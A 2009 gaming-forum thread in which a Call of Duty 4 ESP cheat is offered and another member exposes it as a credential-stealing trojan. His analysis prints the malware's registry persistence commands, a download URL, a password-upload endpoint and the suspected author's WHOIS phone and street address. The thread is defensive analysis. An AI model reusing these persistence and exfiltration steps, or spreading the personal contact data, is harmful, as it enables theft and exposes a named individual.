
HeaveN Cod4 Esp Hack (undetected)

#1 | 03-23-2009, 10:18 PM | DreaMan (Banned User)

Features:
BOX ESP
Undetected...

How To Use:
Start HeaveN Cod4.exe
Start COD4 MP
Join a server.

Have Fun...

I tried this esp hack.
It was working 16.03.2009.

QUOTE...

link removed

#2 | 03-24-2009, 06:42 PM | CampStaff (Guru)
Well, first glance, when we download it, it shows the exe modified date as being 3/23/09, but the dll was modified 2/6/09. So the exe was made a month after the cheat was.

Let's disassemble and hex, shall we:

First thing that happens is when we do that, the exe shows it's binded; there are two exe's as your "heaven.exe". Only reason you'd do that is to hide your trojan 'inside' a loader.

Soooo let's disassemble each exe, cikti.exe and new heaven.exe:

Taking cikti.exe first ( since it's bigger and by names alone, would be my first choice to be a trojan name ) we find:

Code:
oleaut32.dll    SysFreeString   SysReAllocStringLen   SysAllocStringLen advapi32.dll    RegQueryValueExA    RegOpenKeyExA   RegCloseKey user32.dll    GetKeyboardType   DestroyWindow   LoadStringA   MessageBoxA   CharNextA kernel32.dll    GetACP    Sleep   VirtualFree   VirtualAlloc    GetTickCount    QueryPerformanceCounter   GetCurrentThreadId    InterlockedDecrement    InterlockedIncrement    VirtualQuery    WideCharToMultiByte   MultiByteToWideChar   lstrlenA    lstrcpynA   LoadLibraryExA    GetThreadLocale   GetStartupInfoA   GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLastError    GetCommandLineA   FreeLibrary   FindFirstFileA    FindClose   ExitProcess   ExitThread    CreateThread    CompareStringA    WriteFile   UnhandledExceptionFilter    SetFilePointer    SetEndOfFile    RtlUnwind   ReadFile    RaiseException    GetStdHandle    GetFileSize   GetFileType   CreateFileA   CloseHandle kernel32.dll    TlsSetValue   TlsGetValue   LocalAlloc    GetModuleHandleA  user32.dll    CreateWindowExA   WindowFromPoint   WaitMessage   UpdateWindow    UnregisterClassA    UnhookWindowsHookEx   TranslateMessage    TranslateMDISysAccel    TrackPopupMenu    SystemParametersInfoA   ShowWindow    ShowScrollBar   ShowOwnedPopups   SetWindowsHookExA   SetWindowPos    SetWindowPlacement    SetWindowLongW    SetWindowLongA    SetTimer    SetScrollRange    SetScrollPos    SetScrollInfo   SetRect   SetPropA    SetParent   SetMenuItemInfoA    SetMenu   SetForegroundWindow   SetFocus    SetCursor   SetClassLongA   SetCapture    SetActiveWindow   SendMessageW    SendMessageA    ScrollWindow    ScreenToClient    RemovePropA   RemoveMenu    ReleaseDC   ReleaseCapture    RegisterWindowMessageA    RegisterClipboardFormatA    RegisterClassA    RedrawWindow    PtInRect    PostQuitMessage   PostMessageA    PeekMessageW    PeekMessageA    OffsetRect    OemToCharA    MsgWaitForMultipleObjects   MessageBoxA   MapWindowPoints   MapVirtualKeyA    LoadStringA   
LoadKeyboardLayoutA   LoadIconA   LoadCursorA   LoadBitmapA   KillTimer   IsZoomed    IsWindowVisible   IsWindowUnicode   IsWindowEnabled   IsWindow    IsRectEmpty   IsIconic    IsDialogMessageW    IsDialogMessageA    IsChild   InvalidateRect    IntersectRect   InsertMenuItemA   InsertMenuA   InflateRect   GetWindowThreadProcessId    GetWindowTextA    GetWindowRect   GetWindowPlacement    GetWindowLongW    GetWindowLongA    GetWindowDC   GetTopWindow    GetSystemMetrics    GetSystemMenu   GetSysColorBrush    GetSysColor   GetSubMenu    GetScrollRange    GetScrollPos    GetScrollInfo   GetPropA    GetParent   GetWindow   GetMessagePos   GetMessageA   GetMenuStringA    GetMenuState    GetMenuItemInfoA    GetMenuItemID   GetMenuItemCount    GetMenu   GetLastActivePopup    GetKeyboardState    GetKeyboardLayoutNameA    GetKeyboardLayoutList   GetKeyboardLayout   GetKeyState   GetKeyNameTextA   GetIconInfo   GetForegroundWindow   GetFocus    GetDesktopWindow    GetDCEx   GetDC   GetCursorPos    GetCursor   GetClipboardData    GetClientRect   GetClassLongA   GetClassInfoA   GetCapture    GetActiveWindow   FrameRect   FindWindowA   FillRect    EqualRect   EnumWindows   EnumThreadWindows   EnumChildWindows    EndPaint    EnableWindow    EnableScrollBar   EnableMenuItem    DrawTextA   DrawMenuBar   DrawIconEx    DrawIcon    DrawFrameControl    DrawEdge    DispatchMessageW    DispatchMessageA    DestroyWindow   DestroyMenu   DestroyIcon   DestroyCursor   DeleteMenu    DefWindowProcA    DefMDIChildProcA    DefFrameProcA   CreatePopupMenu   CreateMenu    CreateIcon    ClientToScreen    CheckMenuItem   CallWindowProcA   CallNextHookEx    BeginPaint    CharNextA   CharLowerBuffA    CharLowerA    CharUpperBuffA    CharToOemA    AdjustWindowRectEx    ActivateKeyboardLayout  gdi32.dll   UnrealizeObject   StretchBlt    SetWindowOrgEx    SetWinMetaFileBits    SetViewportOrgEx    SetTextColor    SetStretchBltMode   SetROP2   SetPixel    SetEnhMetaFileBits    SetDIBColorTable    
SetBrushOrgEx   SetBkMode   SetBkColor    SelectPalette   SelectObject    SaveDC    RestoreDC   Rectangle   RectVisible   RealizePalette    PlayEnhMetaFile   PatBlt    MoveToEx    MaskBlt   LineTo    IntersectClipRect   GetWindowOrgEx    GetWinMetaFileBits    GetTextMetricsA   GetTextExtentPoint32A   GetSystemPaletteEntries   GetStockObject    GetRgnBox   GetPixel    GetPaletteEntries   GetObjectA    GetEnhMetaFilePaletteEntries    GetEnhMetaFileHeader    GetEnhMetaFileBits    GetDeviceCaps   GetDIBits   GetDIBColorTable    GetDCOrgEx    GetCurrentPositionEx    GetClipBox    GetBrushOrgEx   GetBitmapBits   GdiFlush    ExcludeClipRect   DeleteObject    DeleteEnhMetaFile   DeleteDC    CreateSolidBrush    CreatePenIndirect   CreatePalette   CreateHalftonePalette   CreateFontIndirectA   CreateDIBitmap    CreateDIBSection    CreateCompatibleDC    CreateCompatibleBitmap    CreateBrushIndirect   CreateBitmap    CopyEnhMetaFileA    BitBlt  version.dll   VerQueryValueA    GetFileVersionInfoSizeA   GetFileVersionInfoA kernel32.dll    lstrcpyA    lstrcmpA    WriteFile   WaitForSingleObject   VirtualQuery    VirtualAlloc    Sleep   SizeofResource    SetThreadLocale   SetFilePointer    SetEvent    SetErrorMode    SetEndOfFile    ResumeThread    ResetEvent    ReadFile    RaiseException    QueryPerformanceFrequency   QueryPerformanceCounter   MultiByteToWideChar   MulDiv    LockResource    LoadResource    LoadLibraryA    LeaveCriticalSection    InitializeCriticalSection   GlobalFindAtomA   GlobalDeleteAtom    GlobalAddAtomA    GetWindowsDirectoryA    GetVersionExA   GetVersion    GetTimeZoneInformation    GetTickCount    GetThreadLocale   GetTempPathA    GetSystemDirectoryA   GetStdHandle    GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLocalTime    GetLastError    GetFullPathNameA    GetFileSize   GetFileAttributesA    GetExitCodeThread   GetEnvironmentVariableA   GetDiskFreeSpaceA   GetDateFormatA    GetCurrentThreadId    GetCurrentProcessId   
GetCPInfo   FreeResource    InterlockedIncrement    InterlockedExchange   InterlockedDecrement    FreeLibrary   FormatMessageA    FindResourceA   FindFirstFileA    EnumCalendarInfoA   EnterCriticalSection    DeleteFileA   DeleteCriticalSection   CreateThread    CreateProcessA    CreateMutexA    CreateFileA   CreateEventA    CompareStringA    CloseHandle advapi32.dll    RegQueryValueExA    RegQueryInfoKeyA    RegOpenKeyExA   RegFlushKey   RegEnumValueA   RegEnumKeyExA   RegDeleteValueA   RegCreateKeyExA   RegCloseKey shell32.dll   ShellExecuteA wsock32.dll   WSACleanup    WSAStartup    gethostbyname   socket    send    recv    inet_ntoa   inet_addr   htons   connect   closesocket oleaut32.dll    GetErrorInfo    SysFreeString ole32.dll   OleInitialize   CoTaskMemFree   StringFromCLSID   CoCreateInstance    CoUninitialize    CoInitialize  kernel32.dll    Sleep oleaut32.dll    SafeArrayPtrOfIndex   SafeArrayGetUBound    SafeArrayGetLBound    SafeArrayCreate   VariantChangeType   VariantCopy   VariantClear    VariantInit comctl32.dll    _TrackMouseEvent    ImageList_SetIconSize   ImageList_GetIconSize   ImageList_Write   ImageList_Read    ImageList_DragShowNolock    ImageList_DragMove    ImageList_DragLeave   ImageList_DragEnter   ImageList_EndDrag   ImageList_BeginDrag   ImageList_Remove    ImageList_DrawEx    ImageList_Draw    ImageList_GetBkColor    ImageList_SetBkColor    ImageList_Add   ImageList_SetImageCount   ImageList_GetImageCount   ImageList_Destroy   ImageList_Create  advapi32.dll    CryptDestroyHash    CryptHashData   CryptCreateHash   CryptGetHashParam   CryptReleaseContext   CryptAcquireContextA  crypt32.dll   CryptUnprotectData  advapi32.dll    CredEnumerateA  secur32.dll   GetUserNameExA
Wow. Now.. just some of those are good ( used for cheating ) but.. functions like the Crypt_ ones.. are not needed. But eh.. maybe it's not a virus/trojan. Let's move on further in our findings.

Code:
 check.bat     cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"  /V Shell /D "explorer.exe
Umm. Why are you adding a key to registry for shell to interfere with explorer.exe?

Code:
cmd /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V    /D "     " /f   
   del check.bat      checksystem.bat   del checksystem.bat
   SystemRoot    MAHUAHUAHU HAUAHU  ÿ=   asidasdasdkasd adlkasndladn 243l  dasdlkm3pr ld fldsf kf slks   Error          delme.bat      LgzAzxaaKl~\qmg    user32.dll  
   LgzKlx\va}b        ntcom.dll   #   http://www.wardomania.com/ntcom.dll    StartTheHook   
   desklop.ini
Now we are getting somewhere. As we see, your cheat now seems to download a file from wardomania, then captures what's on desktop ( it's desktop, not desklop.. learn to spell for win! )

Let's continue with our rudimentary analysis, before we upload to a more professional one:

Code:
Msn Sifreleri:
    ie   multipart/form-data    userfile      http://www.wardomania.com/1stupload.php .   http://www.wardomania.com/status.php?username=     &computername=
Seems after you download your trojan dll into the zombie computer, you gain access and have their info sent to your website. Well about that website. You should have done your homework .. because we got you:
Quote:
Domain name: wardomania.com

Registrant Contact:
Shekshy
Harikalar Diyari ()

Fax:
174 sok no 12 daire 3
Izmir, TR 35550
TR

Administrative Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Technical Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Status: Locked

Name Servers:
ns1.turkbox.net
ns2.turkbox.net

Creation date: 09 Sep 2007 12:25:08
Expiration date: 09 Sep 2009 12:25:08
So, Harikalar nice to meet you. There's a lot in this exe, but let's just jump to the chase; Anubis:

Anubis - Anubis Analysis
Quote:
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.

Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.

Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.

Spawns Processes: The executable produces processes during the execution.

Performs Registry Activities: The executable reads and modifies register values. It also creates and monitors register keys.
Well.. let's start..
It adds these files to the host computer:

Quote:
check.bat
C:\WINDOWS\scvhost.exe
\Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ntcom.dll
it reads these files:

Quote:
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
c:\
c:\cikti.exe
C:\WINDOWS\
c:\check.bat
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
and adds these keys to registry:

Quote:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "" = explorer.exe C:\WINDOWS\scvhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "" = C:\WINDOWS\scvhost.exe
Seems he wants to fake a Windows file ( svchost.exe ) with his ( s'c'vhost.exe ).

Anyways, again, thanks for your trojan Harikalar Diyari. It's been an experience.

Last edited by CampStaff; 03-24-2009 at 07:34 PM.
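
A defender-side check for the two persistence traces the analysis above turns up (a Winlogon Shell value carrying an extra program, and autostart data pointing at a near-copy of a Windows binary name), added here as an example and not part of the original thread. The `SYSTEM_BINARIES` list, the function names and the sample value names are assumptions.

```python
import ntpath

# Assumed short list of Windows binaries whose names droppers tend to imitate.
SYSTEM_BINARIES = ("csrss.exe", "explorer.exe", "lsass.exe",
                   "services.exe", "svchost.exe", "winlogon.exe")

def osa_distance(a, b):
    """Edit distance that counts an adjacent swap (scv -> svc) as one edit."""
    d = [[max(i, j) if 0 in (i, j) else 0 for j in range(len(b) + 1)]
         for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]

def lookalike_of(path):
    """Return the system binary name that `path` imitates, or None."""
    name = ntpath.basename(path.strip('"')).lower()
    if name in SYSTEM_BINARIES:
        return None  # exact name; verifying its directory is a separate check
    return next((real for real in SYSTEM_BINARIES
                 if osa_distance(name, real) == 1), None)

def check_autoruns(entries):
    """entries: (key, value_name, data) tuples -> list of (finding, evidence)."""
    findings = []
    for key, value_name, data in entries:
        if (key.lower().endswith("\\winlogon") and value_name.lower() == "shell"
                and data.strip().lower() != "explorer.exe"):
            findings.append(("winlogon-shell-modified", data))
        # Assumption: commands in the data are whitespace-separated, no spaces in paths.
        for token in data.split():
            real = lookalike_of(token)
            if real:
                findings.append(("masquerades-as-" + real, token))
    return findings

# Constructed input: the two autostart values from the sandbox report quoted above
# (value names assumed), plus one clean Winlogon entry for contrast.
SAMPLE_ENTRIES = [
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "Shell", r"explorer.exe C:\WINDOWS\scvhost.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "", r"C:\WINDOWS\scvhost.exe"),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "Shell", "explorer.exe"),
]

if __name__ == "__main__":
    for finding, evidence in check_autoruns(SAMPLE_ENTRIES):
        print(finding, "->", evidence)
```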

#3 | 03-26-2009, 03:16 PM | KiSeL (Newbie)
cool hack

#4 | 03-26-2009, 08:10 PM | DutchNinja (Mentor)
Campstaff give me a TuT how u do this? campstaff!

#5 | 03-29-2009, 04:21 AM | freebullets (Newbie)
Epic

#6 | 04-17-2009, 01:18 AM | Riku98523 (Wannabe Member)
Lol wow that got got owned.

#7 | 09-06-2009, 02:32 PM | dionzor (Newbie)
LOL owned, it's great looking at HEX.

well done on the find.

#8 | 09-28-2009, 05:30 PM | guymfalkon123 (Newbie)
thx

#9 | 11-08-2009, 12:04 PM | ashurov (Newbie)
why you remove the link?

#10 | 11-08-2009, 02:39 PM | Tracky (Sexy in Pink now :D)
Quote:
Originally Posted by ashurov View Post
why you remove the link?

Rly.. Just read through a Thread before answering..
This is a real senseless question.. :/
All times are GMT +1.
